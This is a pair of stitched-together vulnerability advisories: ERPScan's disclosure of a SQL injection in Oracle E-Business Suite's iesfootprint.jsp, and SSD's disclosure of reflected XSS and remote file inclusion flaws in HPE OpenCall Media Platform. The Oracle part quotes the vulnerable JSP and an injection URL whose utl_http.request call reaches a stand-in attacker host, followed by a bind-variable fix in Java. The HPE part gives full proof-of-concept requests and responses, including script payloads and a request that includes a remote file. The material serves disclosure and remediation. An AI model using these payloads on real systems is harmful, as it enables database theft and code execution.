Application: Oracle E-Business Suite
Versions Affected: Oracle EBS 12.2.3
Vendor URL: http://oracle.com
Bug: SQL injection
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Dmitry Chastuhin (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT
Advisory ID: [ERPSCAN-17-021]
Risk: high
CVE: CVE-2017-3549
Advisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: SQL injection
Impact: read sensitive data, modify data from database
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
The code builds an SQL statement from strings that an attacker can
alter. The manipulated SQL statement can then be used to retrieve
additional data from the database or to modify data without
authorization.
4. VULNERABLE PACKAGES
Oracle EBS 12.2.3
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, apply Oracle CPU April 2017.
6. AUTHOR
Dmitry Chastuhin
7. TECHNICAL DESCRIPTION
PoC
Vulnerable JSP: iesfootprint.jsp. The request parameters are copied straight into local variables with no validation:
deployDate = ((request.getParameter("deployDate")) != null) ? request.getParameter("deployDate") : "";
responseDate = ((request.getParameter("responseDate")) != null) ? request.getParameter("responseDate") : "";
dscriptName = ((request.getParameter("dscript_name")) != null) ? request.getParameter("dscript_name") : "";
dscriptId = ((request.getParameter("dscriptId")) != null) ? request.getParameter("dscriptId") : "";
%>
<%
// Process the data based on params
if (showGraph) {
    // Create Query String: the request values are concatenated into the SQL text
    StringBuffer query = new StringBuffer("SELECT panel_name, count_panels, avg_time, min_time, max_time, ");
    query.append("\'").append(_prompts[10]).append("\'");
    query.append(" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time"
        + " FROM (SELECT Panel_name, count(panel_name) count_panels,"
        + " (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time,"
        + " max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = ");
    query.append(dscriptId);                               // unquoted and unvalidated: the injection point
    query.append(" AND start_time between ");
    query.append("\'").append(deployDate).append("\'");    // quoted but not escaped
    query.append(" and ");
    query.append("\'").append(responseDate).append("\'");
    query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11");
    // Get XMLDocument for the corresponding query and Paint graph
    try {
        XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());   // executes the assembled string
        htmlString = XMLServ.getXMLTransform(xmlDoc, htmlURL);
Approximate request with SQL injection
http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'
AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY
panel_name)) --
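The JSP above reaches the database by pasting dscriptId, deployDate and responseDate into the SQL text, which is why a quote in dscriptId changes the statement. The following is an added example, written for this page and not Oracle's patch or code from the advisory, of issuing the same query with JDBC bind variables after validating each input. It assumes the date parameters arrive as "yyyy-MM-dd HH:mm:ss" strings and that a java.sql.Connection to the EBS schema is available; both are assumptions, as is the class name FootprintQuery.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.sql.Timestamp;
import java.time.LocalDateTime;
import java.time.format.DateTimeFormatter;
import java.time.format.DateTimeParseException;

/**
 * Bind-variable rewrite of the iesfootprint.jsp query (illustrative, not Oracle's fix).
 * Request values never become part of the SQL text: they are validated, typed and
 * bound, so a quote or keyword in dscriptId is data, not syntax.
 */
public final class FootprintQuery {

    // Assumption: deployDate/responseDate arrive in this format. Adjust to the real page.
    private static final String DATE_PATTERN = "yyyy-MM-dd HH:mm:ss";
    private static final DateTimeFormatter DATE_FMT = DateTimeFormatter.ofPattern(DATE_PATTERN);

    /** Same SELECT as the JSP, with every request-controlled value replaced by a placeholder. */
    static final String SQL =
          "SELECT panel_name, count_panels, avg_time, min_time, max_time, ? Average_Time"
        + " FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time"
        + "       FROM (SELECT panel_name, count(panel_name) count_panels,"
        + "                    (sum(total_time)/count(panel_name))/1000 avg_time,"
        + "                    min(min_time)/1000 min_time, max(max_time)/1000 max_time"
        + "               FROM IES_SVY_FOOTPRINT_V"
        + "              WHERE dscript_id = ? AND start_time BETWEEN ? AND ?"
        + "              GROUP BY panel_name ORDER BY avg_time DESC))"
        + " WHERE rownum < 11";

    private FootprintQuery() {}

    /** dscript_id is numeric in the view, so anything that is not a number is rejected up front. */
    static long parseDscriptId(String raw) {
        try {
            return Long.parseLong(raw.trim());
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("dscriptId must be numeric");
        }
    }

    /** Dates are parsed to a real type instead of being quoted into the statement. */
    static Timestamp parseDate(String raw, String name) {
        try {
            return Timestamp.valueOf(LocalDateTime.parse(raw.trim(), DATE_FMT));
        } catch (DateTimeParseException e) {
            throw new IllegalArgumentException(name + " must match " + DATE_PATTERN);
        }
    }

    /**
     * Prepare the statement with bound parameters. The driver sends the SQL text and the
     * values separately, so the database never parses user input as SQL.
     */
    static PreparedStatement prepare(Connection conn, String label, String dscriptId,
                                     String deployDate, String responseDate) throws SQLException {
        long id = parseDscriptId(dscriptId);
        Timestamp from = parseDate(deployDate, "deployDate");
        Timestamp to = parseDate(responseDate, "responseDate");
        PreparedStatement ps = conn.prepareStatement(SQL);
        ps.setString(1, label);      // the _prompts[10] column label, formerly quoted into the text
        ps.setLong(2, id);
        ps.setTimestamp(3, from);
        ps.setTimestamp(4, to);
        return ps;
    }

    /** Offline demonstration of the validation step, using the advisory's own dscriptId value. */
    public static void main(String[] args) {
        String fromAdvisory = "11' AND utl_http.request('http://attackers_host/lalal')='1'";
        try {
            parseDscriptId(fromAdvisory);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected before any SQL is built: " + e.getMessage());
        }
        System.out.println("accepted: dscript_id = " + parseDscriptId("11"));
    }
}
```

The validation step is the cheap defence-in-depth layer; the binding is the actual fix. Even if the numeric check were removed, a value bound with setLong cannot change the statement's structure, which is what the CPU-level remediation has to guarantee for every caller of the view.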
8. ABOUT ERPScan Research
The ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It has been acknowledged
multiple times by the largest software vendors, such as SAP, Oracle,
Microsoft, IBM, VMware and HP, for discovering more than 400
vulnerabilities in their solutions (200 of them in SAP alone).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts have participated as speakers, presenters, and trainers
at 60+ prime international security conferences in 25+ countries across
the continents (e.g. BlackHat, RSA, HITB) and have conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project, which is focused on
enterprise application security awareness and issues annual SAP
security research reports.
ERPScan experts have been interviewed by specialized info-sec resources
and featured in major media worldwide, including Reuters, Yahoo, SC
Magazine, The Register, CIO, PC World, DarkReading, Heise and
Chinabyte.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and to provide solutions for CISOs to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
against both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage the security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
Source: https://blogs.securiteam.com/index.php/archives/3087
SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities
Want to get paid for a vulnerability similar to this one?
Contact us at: ssd@beyondsecurity.com
Vulnerabilities Summary
The following advisory describes Reflected Cross-Site Scripting (XSS)
vulnerabilities and a Remote File Inclusion vulnerability, which when
combined can lead to code execution, found in HPE OpenCall Media
Platform (OCMP), version 4.3.2.
HPE OpenCall Media Platform (OCMP) is a suite of software and hardware
applications which allow implementation of common telecom operator
services such as voicemail, SMS (short message service), prepaid,
billing, HLR, etc. It implements industry-standard telecom protocols
and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML.
HPE OpenCall Media Platform offers a highly scalable, easy-to-manage,
carrier-grade media platform that adapts to future networks and
applications. Through its strong support of open standards and
protocols, new applications can be rapidly developed and deployed in a
way that preserves investments and reduces capital expenditures
(CAPEX) and operational expenditure (OPEX).
Three different components of HPE OpenCall Media Platform (OCMP) are
vulnerable; each component has the following vulnerabilities:
Application Content Manager
Reflected Cross-Site Scripting (XSS) – /mcm/resources/
Platform Administration Tool
Reflected Cross-Site Scripting (XSS) that lead to Remote Code Execution
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter
Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter
Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter
VoiceXML Administration Tool
Reflected Cross-Site Scripting (XSS) – event.do function
Reflected Cross-Site Scripting (XSS) – call.do function
Remote File Inclusion – proxylink.do function
Credit
An independent security researcher, Paolo Stagno from VoidSec, has
reported these vulnerabilities to Beyond Security’s SecuriTeam Secure
Disclosure program.
Vendor Responses
HPE has released patches to address these vulnerabilities; for more details see:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03686en_us
Vulnerabilities Details
Application Content Manager – /mcm/resources/
HPE OpenCall Media Platform (OCMP) does not sanitize the “description”
and “prototype” parameters of /mcm/resources/. An attacker can inject
malicious JavaScript to trigger the Reflected Cross-Site Scripting
(XSS).
Proof of Concept
An attacker sends the following POST request to the victim's machine:
POST https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?followindirection=false HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/mcm+json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html
Content-Length: 54
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{ "": "", "description": "<script>alert(1);</script>"}
The server will respond with:
HTTP/1.1 204 No Content
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server
Then the attacker will send the second request to trigger the
Cross-Site Scripting (XSS):
GET https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?format=json&followindirection=false&ms=1443024815924 HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html
Connection: keep-alive
The server will respond with:
HTTP/1.1 200 OK
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-control: no-cache
Content-Type: application/json
Transfer-Encoding: chunked
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server
VoiceXML Administration Tool – call.do function
HPE OpenCall Media Platform (OCMP) does not sanitize the parameters of
the call.do function. An attacker can inject malicious JavaScript to
trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /om/call.do?action=list_calls&type=Active637a3<script>alert(1)<%2fscript>c7e9f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://127.0.0.1:5443/om/servicegroup.do?action=addservicegroup
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B
The server will respond with:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache,no-store
Expires: Thu, 01 Jan 1970 01:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 10 Sep 2015 13:30:41 GMT
Content-Length: 10418
<HTML>
<HEAD>
<TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE>
<LINK REL="stylesheet"
HREF="consolepages/templates/stylesheets/style.css" TYPE="text/css">
</HEAD>
<BODY>
<script type="text/javascript">
//HV Menu v5- by Ger Versluis (www.burmees.nl)
//Submitted to Dynamic Drive (www.dynamicdrive.com)
//Visit www.dynamicdrive.com for this script and more
function Go(){return}
</script>
<script type="text/javascript"
src="consolepages/templates/js/exmplmenu_var.jsp"></script>
<script type="text/javascript"
src="consolepages/templates/js/menu_com.js"></script>
<noscript>Your browser does not support script</noscript>
<TABLE WIDTH="800" BORDER="0">
<TR>
<TD><IMG SRC="consolepages/templates/images/speechweb.gif"/></TD>
</TR>
<TR>
<TD VALIGN="top">
Logged on as: zerpsta1 <SPAN id="warn">
</SPAN>
<BR><BR><BR><BR>
<br>
<b>Call Management -> Active637a3<script>alert(1)</script>c7e9f Calls</b>
<br><br><br>
<table border="1" width="1000">
<tr><td colspan="12" class="tableheader">Calls <a href="#"><img
src="consolepages/templates/images/questionmark.gif" border="0"
onClick="window.open('help.do?prompt=p20', 'help',
'toolbar=no,width=400,height=400,resizable=no,scrollbars=yes');"></a></td></tr>
<tr><td colspan="12"> </td></tr>
<tr>
<td><b><a href=call.do?action=sort_calls&type=node>Server Id</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=callid>CallId</a></b></td>
<td><b>CDR</b></td>
<td><b>Call Monitoring</b></td>
<td><b>Service Id</b></td>
<td><b><a href=call.do?action=sort_calls&type=ruri>Remote-URI</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=luri>Local-URI</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=severe>Severes</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=warning>Warnings</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=vxml_exception>VoiceXML
Exceptions</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=time>Started At</a></b></td>
<td><b>Duration</b></td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_3</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_3&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470521123</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=vxml_exception
target="new">21</a></td>
<td>150909 19:00:52.429</td><td>00:00:00.502</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_2</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_2&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470174023</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=vxml_exception
target="new">21</a></td>
<td>150908 19:29:05.236</td><td>00:00:00.501</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_2</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_2&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470852423</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=vxml_exception
target="new">21</a></td>
<td>150908 19:27:56.237</td><td>00:00:01.003</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_1</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_1&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470632723</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=vxml_exception
target="new">21</a></td>
<td>150907 18:57:21.548</td><td>00:00:01.004</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_1</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_1&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470277023</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=vxml_exception
target="new">21</a></td>
<td>150907 15:13:19.660</td><td>00:00:01.003</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_0</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_0&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470860823</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=vxml_exception
target="new">21</a></td>
<td>150907 15:12:15.254</td><td>00:00:00.501</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_0</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_0&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_3xxx">o2_ivr_3xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1540003000009388</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=ERROR
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=vxml_exception
target="new">0</a></td>
<td>150907 15:00:13.901</td><td>00:00:45.194</td>
</tr>
</table>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
VoiceXML Administration Tool – event.do function
HPE OpenCall Media Platform (OCMP) does not sanitize the parameters of
the event.do function. An attacker can inject malicious JavaScript to
trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/event.do?action=list&type=XSS_HERE
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /om/event.do?action=list&type=Active637a3<script>alert(1)<%2fscript>c7e9f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://172.27.116.32:5443/om/call.do?action=trace_calls&type=trace_calls
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 172.27.116.32:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B
The server will respond with:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2437
Date: Thu, 10 Sep 2015 13:32:55 GMT
<HTML>
<HEAD>
<TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE>
<LINK REL="stylesheet"
HREF="consolepages/templates/stylesheets/style.css" TYPE="text/css">
</HEAD>
<BODY>
<script type="text/javascript">
//HV Menu v5- by Ger Versluis (www.burmees.nl)
//Submitted to Dynamic Drive (www.dynamicdrive.com)
//Visit www.dynamicdrive.com for this script and more
function Go(){return}
</script>
<script type="text/javascript"
src="consolepages/templates/js/exmplmenu_var.jsp"></script>
<script type="text/javascript"
src="consolepages/templates/js/menu_com.js"></script>
<noscript>Your browser does not support script</noscript>
<TABLE WIDTH="800" BORDER="0">
<TR>
<TD><IMG SRC="consolepages/templates/images/speechweb.gif"/></TD>
</TR>
<TR>
<TD VALIGN="top">
Logged on as: zerpsta1 <SPAN id="warn">
</SPAN>
<BR><BR><BR><BR>
<script language="JavaScript">
function toggleVisibility( divId, buttonId ) {
if( document.all[divId].style.display == 'none' ) {
document.all[divId].style.display = 'inline';
document.all[buttonId].value = 'Hide Stacktrace';
} else {
document.all[divId].style.display = 'none';
document.all[buttonId].value = 'Show Stacktrace';
}
}
</script>
<br>
<b>Active637a3<script>alert(1)</script>c7e9f</b>
<br><br>
<form action="event.do">
<input type="submit" value="Reset" name="submit" onClick="return
confirm('Are you sure you want to remove all
Active637a3<script>alert(1)</script>c7e9f?')">
<input type="hidden" name="action" value=reset >
<input type="hidden" name="type"
value="Active637a3<script>alert(1)</script>c7e9f">
</form>
<br><br>
<table border="1" width="1200">
<tr><td colspan="8" class="tableheader">Events <a href="#"><img
src="consolepages/templates/images/questionmark.gif" border="0"
onClick="window.open('help.do?prompt=p21', 'help',
'toolbar=no,width=400,height=400,resizable=no,scrollbars=yes');"></a></td></tr>
<tr><td colspan="8"> </td></tr>
<tr>
<td><b><a href=event.do?action=sort&type=NODE >Server Id</a></b></td>
<td><b><a href=event.do?action=sort&type=TIME >Date</a></b></td>
<td><b><a href=event.do?action=sort&type=CALL >CallId</a></b></td>
<td><b>CDR</b></td>
<td><b>Service Id</b></td>
<td><b>Message</b></td>
</tr>
<tr><td colspan="8"> </td></tr>
<tr><td colspan="8">No Items Found</td></tr>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
VoiceXML Administration Tool – proxylink.do function
HPE OpenCall Media Platform (OCMP) does not sanitize the parameters of
the proxylink.do function. An attacker can supply a malicious URL to
include a remote file. After the file is included, HPE OpenCall Media
Platform parses and executes its content.
The vulnerable URL: /om/proxylink.do?url=Remote File Inclusion Here (RFI)
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /om/proxylink.do?url=http://172.27.120.220:9595/fruuuuk.txt HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 172.27.116.32:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5D8C311BBE2784FB2CE6DB970878D3CA
The server will respond with:
HTTP/1.1 200 OK
